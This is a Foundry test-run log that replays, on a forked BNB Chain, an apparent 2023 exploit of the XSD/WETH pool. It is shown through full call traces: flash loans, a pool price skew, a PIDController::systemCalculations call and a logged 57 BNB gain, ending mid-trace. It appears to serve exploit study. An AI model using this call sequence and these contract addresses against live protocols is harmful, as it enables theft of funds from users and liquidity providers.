Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.41s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-09/XSDWETHpool_exp.sol:59:5:
   |
59 |     IWBNB WBNB = IWBNB(payable(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c));
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:2436:1:
     |
2436 | interface WBNB {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
  --> src/test/2023-09/XSDWETHpool_exp.sol:58:1:
   |
58 | contract ContractTest is Test {
   | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
   --> src/test/2023-09/XSDWETHpool_exp.sol:110:5:
    |
110 |     fallback() external payable {
    |     ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-09/XSDWETHpool_exp.sol:97:31:
   |
97 |     function DPPFlashLoanCall(address sender, uint256 amount, uint256 quoteAmount, bytes calldata data) external {
   |                               ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-09/XSDWETHpool_exp.sol:97:47:
   |
97 |     function DPPFlashLoanCall(address sender, uint256 amount, uint256 quoteAmount, bytes calldata data) external {
   |                                               ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-09/XSDWETHpool_exp.sol:97:63:
   |
97 |     function DPPFlashLoanCall(address sender, uint256 amount, uint256 quoteAmount, bytes calldata data) external {
   |                                                               ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 465.71ms (1.78ms CPU time)

Ran 1 test for src/test/2023-09/XSDWETHpool_exp.sol:ContractTest
[PASS] testExploit() (gas: 888962)
Logs:
  Before Start: 0 BNB
  Attack Exploit: 56.964339410199718035 BNB

Traces:
  [371571] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 32086900 [3.208e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], "WBNB")
    │   └─ ← [Return]
    ├─ [0] VM::label(DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681], "DPPOracle")
    │   └─ ← [Return]
    ├─ [0] VM::label(DPPAdvance: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d], "DPPAdvance")
    │   └─ ← [Return]
    ├─ [0] VM::label(XSD: [0x39400E67820c88A9D67F4F9c1fbf86f3D688e9F6], "XSD")
    │   └─ ← [Return]
    ├─ [0] VM::label(Router: [0xfADDa925e10d07430f5d7461689fd90d3D81bB48], "Router")
    │   └─ ← [Return]
    ├─ [0] VM::label(XSDWETHpool: [0xbfBcB8BDE20cc6886877DD551b337833F3e0d96d], "XSDWETHpool")
    │   └─ ← [Return]
    ├─ [0] VM::label(PIDController: [0x82a6405B9C38Eb1d012c7B06642dcb3D7792981B], "PIDController")
    │   └─ ← [Return]
    ├─ [2585] XSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [585] XSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::accesses(XSD: [0x39400E67820c88A9D67F4F9c1fbf86f3D688e9F6])
    │   └─ ← [Return] [0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03], []
    ├─ [0] VM::load(XSD: [0x39400E67820c88A9D67F4F9c1fbf86f3D688e9F6], 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ emit WARNING_UninitedSlot(who: XSD: [0x39400E67820c88A9D67F4F9c1fbf86f3D688e9F6], slot: 43395567998282996429510105732813622026225105309595388710023329053794126379779 [4.339e76])
    ├─ [0] VM::load(XSD: [0x39400E67820c88A9D67F4F9c1fbf86f3D688e9F6], 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [585] XSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(XSD: [0x39400E67820c88A9D67F4F9c1fbf86f3D688e9F6], 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff)
    │   └─ ← [Return]
    ├─ [585] XSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    ├─ [0] VM::store(XSD: [0x39400E67820c88A9D67F4F9c1fbf86f3D688e9F6], 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: XSD: [0x39400E67820c88A9D67F4F9c1fbf86f3D688e9F6], fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 43395567998282996429510105732813622026225105309595388710023329053794126379779 [4.339e76])
    ├─ [0] VM::load(XSD: [0x39400E67820c88A9D67F4F9c1fbf86f3D688e9F6], 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [0] VM::store(XSD: [0x39400E67820c88A9D67F4F9c1fbf86f3D688e9F6], 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, 0x000000000000000000000000000000000000000000000860e3dbe7c27afc212e)
    │   └─ ← [Return]
    ├─ [585] XSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 39566238265722260955438 [3.956e22]
    ├─ [24420] WBNB::approve(0x224E13D9eAB11eDc09411ef4bF800791a7EF6135, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x224E13D9eAB11eDc09411ef4bF800791a7EF6135, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   └─ ← [Return] true
    ├─ [24420] WBNB::approve(Router: [0xfADDa925e10d07430f5d7461689fd90d3D81bB48], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Router: [0xfADDa925e10d07430f5d7461689fd90d3D81bB48], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   └─ ← [Return] true
    ├─ [24671] XSD::approve(Router: [0xfADDa925e10d07430f5d7461689fd90d3D81bB48], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Router: [0xfADDa925e10d07430f5d7461689fd90d3D81bB48], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   └─ ← [Return] true
    └─ ← [Stop]

  [968362] ContractTest::testExploit()
    ├─ [2534] WBNB::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] console::log("Before Start: %d BNB", 0) [staticcall]
    │   └─ ← [Stop]
    ├─ [943812] DPPOracle::flashLoan(3000000000000000000000 [3e21], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x0000000000000000000000000000000000000000000000a2a15d09519be00000)
    │   ├─ [27962] WBNB::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3000000000000000000000 [3e21])
    │   │   ├─ emit Transfer(from: DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3000000000000000000000 [3e21])
    │   │   ├─  storage changes:
    │   │   │   @ 0x95870720a9b5a6420749f02df2d1248f9e2447dd5ed7a5b82d399a1b406f5197: 0x0000000000000000000000000000000000000000000000bc487a7fc45b81a26e → 0x000000000000000000000000000000000000000000000019a71d7672bfa1a26e
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000a2a15d09519be00000
    │   │   └─ ← [Return] true
    │   ├─ [892007] ContractTest::DPPFlashLoanCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3000000000000000000000 [3e21], 0, 0x0000000000000000000000000000000000000000000000a2a15d09519be00000)
    │   │   ├─ [877687] DPPAdvance::flashLoan(1000000000000000000000 [1e21], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00000000000000000000000000000000000000000000003635c9adc5dea00000)
    │   │   │   ├─ [874988] 0x7f60701206F85354147806a846CE59Bb7467ac53::flashLoan(1000000000000000000000 [1e21], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00000000000000000000000000000000000000000000003635c9adc5dea00000) [delegatecall]
    │   │   │   │   ├─ [8062] WBNB::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1000000000000000000000 [1e21])
    │   │   │   │   │   ├─ emit Transfer(from: DPPAdvance: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1000000000000000000000 [1e21])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000a2a15d09519be00000 → 0x0000000000000000000000000000000000000000000000d8d726b7177a800000
    │   │   │   │   │   │   @ 0x3c60da1376f85a7f3c888682818856b0c611572c8d06dc51114a9951a6f90e17: 0x0000000000000000000000000000000000000000000000457dcc65ee8dec834d → 0x00000000000000000000000000000000000000000000000f4802b828af4c834d
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [840500] ContractTest::DPPFlashLoanCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1000000000000000000000 [1e21], 0, 0x00000000000000000000000000000000000000000000003635c9adc5dea00000)
    │   │   │   │   │   ├─ [2585] XSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 39566238265722260955438 [3.956e22]
    │   │   │   │   │   ├─ [797049] Router::swapXSDForETH(9840000000000000000 [9.84e18], 39566238265722260955438 [3.956e22])
    │   │   │   │   │   │   ├─ [2369] XSDWETHpool::getReserves() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 228330434662557709755649 [2.283e23], 66911215838228063464 [6.691e19], 1695752667 [1.695e9]
    │   │   │   │   │   │   ├─ [13200] XSD::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], XSDWETHpool: [0xbfBcB8BDE20cc6886877DD551b337833F3e0d96d], 39566238265722260955438 [3.956e22])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: XSDWETHpool: [0xbfBcB8BDE20cc6886877DD551b337833F3e0d96d], value: 39566238265722260955438 [3.956e22])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000860e3dbe7c27afc212e → 0
    │   │   │   │   │   │   │   │   @ 0xbd438142a761e95b3fb372672bcff2e202c3924835bec4a7705d3d1d66e3e062: 0x000000000000000000000000000000000000000000003059d152831b22dbe501 → 0x0000000000000000000000000000000000000000000038bab52e6add9dd8062f
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [72018] XSDWETHpool::swap(0, 9840000000000000000 [9.84e18], Router: [0xfADDa925e10d07430f5d7461689fd90d3D81bB48])
    │   │   │   │   │   │   │   ├─ [29962] WBNB::transfer(Router: [0xfADDa925e10d07430f5d7461689fd90d3D81bB48], 9840000000000000000 [9.84e18])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: XSDWETHpool: [0xbfBcB8BDE20cc6886877DD551b337833F3e0d96d], to: Router: [0xfADDa925e10d07430f5d7461689fd90d3D81bB48], value: 9840000000000000000 [9.84e18])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x86e7fb876aae3f33df41af6d98f92d856f261421355a70f48607a80e4e8fc2e0: 0x000000000000000000000000000000000000000000000003a094644b471324e8 → 0x0000000000000000000000000000000000000000000000031805b06db93b24e8
    │   │   │   │   │   │   │   │   │   @ 0x56e26e797598d5291f1150050b5a6538924128b4f9f5326bd3ff0fa4ddb623a8: 0 → 0x000000000000000000000000000000000000000000000000888eb3dd8dd80000
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [585] XSD::balanceOf(XSDWETHpool: [0xbfBcB8BDE20cc6886877DD551b337833F3e0d96d]) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 267896672928279970711087 [2.678e23]
    │   │   │   │   │   │   │   ├─ [534] WBNB::balanceOf(XSDWETHpool: [0xbfBcB8BDE20cc6886877DD551b337833F3e0d96d]) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 57071215838228063464 [5.707e19]
    │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 267896672928279970711087 [2.678e23], reserve1: 57071215838228063464 [5.707e19])
    │   │   │   │   │   │   │   ├─ emit Swap(sender: Router: [0xfADDa925e10d07430f5d7461689fd90d3D81bB48], amount0In: 39566238265722260955438 [3.956e22], amount1In: 0, amount0Out: 0, amount1Out: 9840000000000000000 [9.84e18], to: Router: [0xfADDa925e10d07430f5d7461689fd90d3D81bB48])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 61: 0x000000000000000000000000000000000e3494b0f46c7b3751e13c1ccf459b96 → 0x000000000000000000000000000000000e34cddb308b039390d829857cf91b6e
    │   │   │   │   │   │   │   │   @ 56: 0x00000000000000000000000000000000000000000000001b1ae4d6e2ef500000 → 0x000000000000000000000000000000000000000000000860e3dbe7c27afc212e
    │   │   │   │   │   │   │   │   @ 60: 0x651321db000000000003a094644b471324e8000000003059d152831b22dbe501 → 0x651324d50000000000031805b06db93b24e80000000038bab52e6add9dd8062f
    │   │   │   │   │   │   │   │   @ 62: 0x000000000000000000000000001bc54d2bb8583abbd26c6c7800be08975a0610 → 0x000000000000000000000000001bc574d90ec61805a1d87cf3cefcbbb2e252ec
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ [9365] WBNB::withdraw(9840000000000000000 [9.84e18])
    │   │   │   │   │   │   │   ├─ [225] Router::fallback{value: 9840000000000000000}()
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   ├─ emit Withdrawal(src: Router: [0xfADDa925e10d07430f5d7461689fd90d3D81bB48], wad: 9840000000000000000 [9.84e18])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x56e26e797598d5291f1150050b5a6538924128b4f9f5326bd3ff0fa4ddb623a8: 0x000000000000000000000000000000000000000000000000888eb3dd8dd80000 → 0
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ [637916] ContractTest::fallback{value: 9840000000000000000}()
    │   │   │   │   │   │   │   ├─ [3262] WBNB::transfer(XSDWETHpool: [0xbfBcB8BDE20cc6886877DD551b337833F3e0d96d], 3800000000000000000000 [3.8e21])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: XSDWETHpool: [0xbfBcB8BDE20cc6886877DD551b337833F3e0d96d], value: 3800000000000000000000 [3.8e21])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000d8d726b7177a800000 → 0x00000000000000000000000000000000000000000000000ad78ebc5ac6200000
    │   │   │   │   │   │   │   │   │   @ 0x86e7fb876aae3f33df41af6d98f92d856f261421355a70f48607a80e4e8fc2e0: 0x0000000000000000000000000000000000000000000000031805b06db93b24e8 → 0x0000000000000000000000000000000000000000000000d1179dab2a6d9b24e8
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [16428] XSDWETHpool::swap(263932735529288914857295 [2.639e23], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   │   │   ├─ [3235] XSD::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 263932735529288914857295 [2.639e23])
    │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: XSDWETHpool: [0xbfBcB8BDE20cc6886877DD551b337833F3e0d96d], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 263932735529288914857295 [2.639e23])
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 0xbd438142a761e95b3fb372672bcff2e202c3924835bec4a7705d3d1d66e3e062: 0x0000000000000000000000000000000000000000000038bab52e6add9dd8062f → 0x0000000000000000000000000000000000000000000000d6e2ae9e8abbbd98e0
    │   │   │   │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000037e3d27fcc52e21a6d4f
    │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   ├─ [585] XSD::balanceOf(XSDWETHpool: [0xbfBcB8BDE20cc6886877DD551b337833F3e0d96d]) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 3963937398991055853792 [3.963e21]
    │   │   │   │   │   │   │   │   ├─ [534] WBNB::balanceOf(XSDWETHpool: [0xbfBcB8BDE20cc6886877DD551b337833F3e0d96d]) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 3857071215838228063464 [3.857e21]
    │   │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 3963937398991055853792 [3.963e21], reserve1: 3857071215838228063464 [3.857e21])
    │   │   │   │   │   │   │   │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 0, amount1In: 3800000000000000000000 [3.8e21], amount0Out: 263932735529288914857295 [2.639e23], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 60: 0x651324d50000000000031805b06db93b24e80000000038bab52e6add9dd8062f → 0x651324d50000000000d1179dab2a6d9b24e80000000000d6e2ae9e8abbbd98e0
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   ├─ [332625] PIDController::systemCalculations()
    │   │   │   │   │   │   │   │   ├─ [2606] 0x4d369BD339709021267E92702A9E4cE30be85706::balanceOf(0x224E13D9eAB11eDc09411ef4bF800791a7EF6135) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 1347232252051346746666623 [1.347e24]
    │   │   │   │   │   │   │   │   ├─ [37233] XSD::bankx_price() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [21162] 0xfa2dcD1aaA0E3dB79A2e3b2aDb1e286C27b5cE75::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [15643] 0x0567F2323251f0Aab15c8dFb1967E4e8A7D42aeE::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [7410] 0x137924D7C36816E0DcAF016eB617Cc2C92C05782::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3031251 [3.031e6], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 3031251 [3.031e6]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147422134483 [3.689e19], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 36893488147422134483 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000004ede22f38
    │   │   │   │   │   │   │   │   │   ├─ [2369] 0x224E13D9eAB11eDc09411ef4bF800791a7EF6135::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 1347232252051346746666623 [1.347e24], 2600870202054432854 [2.6e18], 1695698658 [1.695e9]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000198
    │   │   │   │   │   │   │   │   ├─ [2405] XSD::totalSupply() [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 20000547033338243084561810 [2e25]
    │   │   │   │   │   │   │   │   ├─ [9181] XSD::xsd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [4162] 0xfa2dcD1aaA0E3dB79A2e3b2aDb1e286C27b5cE75::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x0567F2323251f0Aab15c8dFb1967E4e8A7D42aeE::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x137924D7C36816E0DcAF016eB617Cc2C92C05782::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3031251 [3.031e6], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 3031251 [3.031e6]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147422134483 [3.689e19], 21170892600 [2.117e10], 1695753426 [1.695e9], 1695753426 [1.695e9], 36893488147422134483 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000004ede22f38
    │   │   │   │   │   │   │   │   │   ├─ [369] XSDWETHpool::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 3963937398991055853792 [3.963e21], 3857071215838228063464 [3.857e21], 1695753429 [1.695e9]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000c9e6bfe
    │   │   │   │   │   │   │   │   ├─ [2352] 0x2946Ca638EB11830E83Feaa130aA8B13d37C3772::collat_XSD()
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000015b42616817e3414b
    │   │   │   │   │   │   │   │   ├─ [2407] XSD::global_collateral_ratio() [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000f4240
    │   │   │   │   │   │   │   │   ├─ [25156] XSD::xag_usd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [21162] 0x25E084A3B5dAb1F8272BBcC9E2935430069DB8Ff::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [15643] 0x817326922c909b16944817c207562B25C4dF16aD::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [7410] 0x168f55dFe619E37fe2393c3bA3c831647F8617c0::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 125646 [1.256e5], 2287435000 [2.287e9], 1695752859 [1.695e9], 1695752859 [1.695e9], 125646 [1.256e5]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147419228878 [3.689e19], 2287435000 [2.287e9], 1695752859 [1.695e9], 1695752859 [1.695e9], 36893488147419228878 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000088577cf8
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000015d08ee
    │   │   │   │   │   │   │   │   ├─ [369] XSDWETHpool::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 3963937398991055853792 [3.963e21], 3857071215838228063464 [3.857e21], 1695753429 [1.695e9]
    │   │   │   │   │   │   │   │   ├─ [5656] XSD::xag_usd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [4162] 0x25E084A3B5dAb1F8272BBcC9E2935430069DB8Ff::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x817326922c909b16944817c207562B25C4dF16aD::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x168f55dFe619E37fe2393c3bA3c831647F8617c0::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 125646 [1.256e5], 2287435000 [2.287e9], 1695752859 [1.695e9], 1695752859 [1.695e9], 125646 [1.256e5]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 36893488147419228878 [3.689e19], 2287435000 [2.287e9], 1695752859 [1.695e9], 1695752859 [1.695e9], 36893488147419228878 [3.689e19]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000088577cf8
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000015d08ee
    │   │   │   │   │   │   │   │   ├─ [5620] XSD::eth_usd_price() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [4162] 0xfa2dcD1aaA0E3dB79A2e3b2aDb1e286C27b5cE75::getLatestPrice() [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x0567F2323251f0Aab15c8dFb1967E4e8A7D42aeE::latestRoundData() [staticcall]
